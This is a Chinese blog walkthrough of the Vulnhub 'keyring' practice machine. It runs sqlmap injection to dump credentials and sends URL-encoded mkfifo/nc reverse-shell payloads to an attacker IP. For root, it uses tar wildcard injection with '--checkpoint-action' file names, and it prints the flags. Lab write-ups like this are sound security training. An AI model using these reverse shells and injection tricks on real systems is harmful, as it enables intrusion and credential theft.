Vulnhub-keyring靶机

最新推荐文章于 2024-05-07 16:35:55 发布
最新推荐文章于 2024-05-07 16:35:55 发布
阅读量3k 收藏
点赞数
分类专栏: web安全 文章标签: 安全 php 网络安全 linux html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lionwerson/article/details/121755655
版权

keyring下载地址icon-default.png?t=LA92https://download.vulnhub.com/ia/keyring-v1.01.ova1.下载靶机,网络改为桥接模式然后打开靶机,nmap扫描一下:

nmap.exe -p- 192.168.0.15

开放ssh的22端口和http的80端口,ssh端口无法登录,设置了只能用密钥登录。

 先注册一个用户,admin用户显示已经被注册了,只能换一个注册:

后台非常简陋,看来不是cms,路径扫描找到一个history.php的文件。

history.php直接访问没有反应,但是在登出的时候,会显示can't find this user's activity,可能是存在user参数:

访问:

https://github.com/cyberbot75/keyring

 找到了页面的源码login.php:

 control.php存在注入:

 

sqlmap注入跑一下,这里有个坑:sqlmap要加一个-f的参数,否则新版sqlmap会跑不出其他的库,只能读取默认的mysql数据库,这里要特别注意。

python3 sqlmap.py -u http://192.168.0.15/history.php?user=admin --cookie="PHPSESSID=8ksj6b6d2uo9g58ljbflfi6q0m" --dbs -f

 

dump一下users数据库:

python3 sqlmap.py -u http://192.168.0.15/history.php?user=admin --cookie="PHPSESSID=8ksj6b6d2uo9g58ljbflfi6q0m" --dump users

 

2.反弹nc:

使用cmdcntr的参数执行命令,没有写入权限,只好反弹nc:

 

 反弹nc之前先url编码一下:

http://192.168.0.15/control.php?cmdcntr=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20192.168.0.16%208090%20%3E%20%2Ftmp%2Ff

反弹之后,使用另一个用户john登录,密码是:{Sup3r$S3cr3t$PasSW0RD}和admin的密码一样在mysql的users数据库中。

 

 在john的目录下面有一个compress的可执行文件,下载之后,反编译一下,发现main函数为:

main(void)
{
 setgid(0);
 setuid(0);
 system("/bin/tar cf archive.tar *");
 return 0;
}

可以利用这个文件进行通配符提权:

利用通配符进行Linux本地提权

 

echo "mkfifo /tmp/lhennp; nc 192.168.0.16 4444 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
chmod +x shell.sh  #赋予执行权限
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
tar cf archive.tar *  #这一步可以省略,因为在compress文件中就可以执行这个命令
./compress #进行root权限反弹

 

反弹成功,读取flag:

user.txt

[ Keyring - User Owned ]
----------------------------------------------
Flag : VEhNe0Jhc2hfMXNfRnVuXzM4MzEzNDJ9Cg==
----------------------------------------------
by infosecarticles with <3

THM{Bash_1s_Fun_3831342}

root.txt

[ Keyring - Rooted ]
---------------------------------------------------
Flag : VEhNe0tleXIxbmdfUjAwdDNEXzE4MzEwNTY3fQo=
---------------------------------------------------
by infosecarticles with <3

THM{Keyr1ng_R00t3D_18310567}

lionwerson
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ps4-pkg-sender:一个用于远程pkg安装程序的docker compose Web服务器ui
05-14
PS4 PKG发件人 这是用于的 Web服务器UI 依存关系 安装Docker Compose 此处的说明: : 配置 知识产权 在docker-compose.yml文件中,您将在environment部分看到: LOCALIP = 192.168.0.2 PS4IP = 192.168.0.100 用运行它的计算机的IP替换192.168.0.2 ( LOCALIP的值)。 将192.168.0.100 ( PS4IP的值)替换为PS4的IP。 用来服务PKG的文件夹 ./files是用于查找* .pkg文件的文件夹 你可以: 将所需的PKG移动到files夹中。 或者 用符号链接替换files夹,该符号链接指向您想要的PKG所在的位置。 跑步 docker-compose -f /path/to/docker-compose.yml up 用法 首先,确保PS4在
vulnhub靶机DC4
weixin_52450702的博客
11-02 643
dc-4靶机ip:192.168.70.163靶机下载地址:https://download.vulnhub.com/dc/DC-4.zip.torrent。
Vulnhub靶场之Me-and-My-Girlfriend
weixin_51446936的博客
06-10 706
先看一下描述: 一、靶机搭建 1. 靶机下载 下载地址:https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova 2. 靶机导入 第一步:导入(打开虚拟机–>选择下载的靶机–>选择存储路径–>导入) 注:会报导入失败的错误,点击重试即可。 第二步:导入后,删除网卡并重新添加(NAT网卡) 第三步:启动虚拟机 二、信息收集 1. nmap扫描确定靶机ip nmap -sS -Pn 192.168.
vulnhub之ICA1靶机
lionwerson的博客
11-24 3096
https://download.vulnhub.com/ica/ica1.ziphttp://ICA-1靶机下载1.下载靶机,virtualbox网络改为桥接模式,然后开机: 2.nmap扫描一下端口: nmap 192.168.0.11 -p- 有80端口和22端口,先从web端入手: 是一个登录界面,用电子邮箱和用户名登录,不打算先用暴力破解,先sqlmap跑一下: python sqlmap.py -r 1.txt 不过好像不存在sql注入,只能另辟蹊径,这个是一..
vulnhub-Momentum2
plant1234的博客
08-30 574
vulnhub-Momentum2靶机 首先先去下载靶机地址: https://download.vulnhub.com/momentum/Momentum2.ova 下载完靶机,直接利用VMave导入打开 一,信息收集 首先确定自己的靶机为net模式,知道自己靶机所在网段 然后利用kali进行IP扫描: nmap -sP 192.168.229.0/24 发现存活的IP,除去自己的IP 发现靶机IP:192.168.229.155 如果不能扫描出IP就查看这篇博客: https://hackergu.
解决MySQL Workbench gnome-keyring-daemon错误的方法分享
09-10
然而,在某些Linux发行版,如Fedora,用户可能会遇到与gnome-keyring-daemon相关的错误,这会导致MySQL Workbench无法正常存储密码到系统钥匙环,进而影响数据库的连接。gnome-keyring-daemon是GNOME桌面环境中的一...
go-keyring:Go的跨平台密钥环界面
05-28
进入钥匙圈库 go-keyring是一个与操作系统无关的库,用于设置,获取和删除系统密钥环中的机密。 它支持OS X , Linux(dbus)和Windows 。 go-keyring是在其作者搜索但找不到更好的替代方法之后创建的。 它旨在简化...
gnome-keyring-3.28.2-1.el8.x86_64.rpm
12-09
离线安装包,亲测可用
gnome-keyring-3.28.2-1.el7.x86_64.rpm
12-13
官方离线安装包,亲测可用。使用rpm -ivh [rpm完整包名] 进行安装
vulnhub-CH4INRULZ渗透测试
遇事不决冲冲冲
11-17 3440
环境搭建 vulnhub官网https://download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova 下载好后直接拖进来,失败就再拖一次,成功部署后就是一个登陆界面 思路 nmap开路拿到四个端口,80和8011开放了Web服务,之后在扫80端口的目录时发现/development状态码是401需要密码认证,接着扫文件发现index.html.bak利用john爆破拿到账号密码,之后就是一个文件上传的功能,还是扫8011端口的目录发现文件包含漏洞。两者结合。其
Vulnhub】之Nagini
zg_111的博客
04-13 1411
根据之前得到的bak配置文件,我们知道服务器启用了Mysql数据库,并且用户名为goblin,密码为空,接下来我们可以使用gopher协议查询Joomla的后台管理员账密,从而登陆至Web后台进行下一步操作。在hermoine用户文件夹下,我们发现了隐藏的文件夹.mozilla,该文件夹是在linux操作系统中使用firefox浏览器后,在当前用户的目录下就会生成给.mozilla目录,进入该文件夹,可以发现当前浏览器中的安装的扩展包、配置信息及包括浏览器登录某些web应用后记录下的用户名和密码信息。
vulnhub靶场AI-WEB-1.0
qq_42307546的博客
05-03 613
靶机下载地址 https://download.vulnhub.com/aiweb/AI-Web-1.0.7z 主机探测 netdiscover -i eth0 -r 192.168.1.0/24 端口探测 nmap -p 1-65535 -sC -sV 192.168.1.14 开启了80端口访问 web目录爆破 gobuster dir -u http://192.168.1.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-m
Vulnhub靶机的下载和使用
laoyanCZ的博客
11-26 1077
一、何为Virtualbox? ​​​​​Virtualbox跟Vmware一样,是创建虚拟机的软件,两者的功能基本上是一样的。 那我们为什么要安装Virtualbox呢?因为Vulnhub上面的靶机在导入到Virtualbox会稳定一些,基本上不会出现什么兼容性的问题,而导入到Vmware可能会报一些错误,就导致我们无法正常导入,所以我们一般都用Virtualbox来打开Vulnhub上的靶机。二、博主的渗透环境 博主一般都是习惯于kali安装在Vmware里面,
Vulnhub靶机:hacksudo-Thor
qq_48904485的博客
02-09 1011
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:hacksudo-Thor(10.0.2.49)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hacksudo/hacksudo—Thor.zip。
靶机渗透练习87-IA:Keyring (1.0.1)
hirak0的博客
04-30 1415
靶机描述 靶机地址:https://www.vulnhub.com/entry/ia-keyring-101,718/ Description Difficulty: Intermediate Goal: Get the root shell and read all the 2 flags. Information: No hints will be provided before 24 hours of the release. Try Harder! If you need any hints,
Vulnhub-IA: KEYRING (1.0.1)渗透
laoyanCZ的博客
12-16 953
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
Aluxian_的博客
10-26 806
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
[Vulnhub靶机] DC-1
最新发布
haosha。的博客
05-07 4148
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
vulnhub靶机DC1
weixin_52450702的博客
10-29 986
靶机DC1IP:192.168.70.160。
为何先安装的cuda-keyring_1.0-1_all.deb,后安装的 CUDA Toolkit,却要先卸载cuda-keyring_1.0-1_all.deb,然后再卸载 cuda-keyring_1.0-1_all.deb
06-04
这是因为 `cuda-keyring_1.0-1_all.deb` 是 CUDA Toolkit 的一个依赖项,它提供了 CUDA 官方软件包的签名验证。当您手动安装了 `cuda-keyring_1.0-1_all.deb` 后,它会被视为一个已经安装的软件包。当您使用 `apt` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值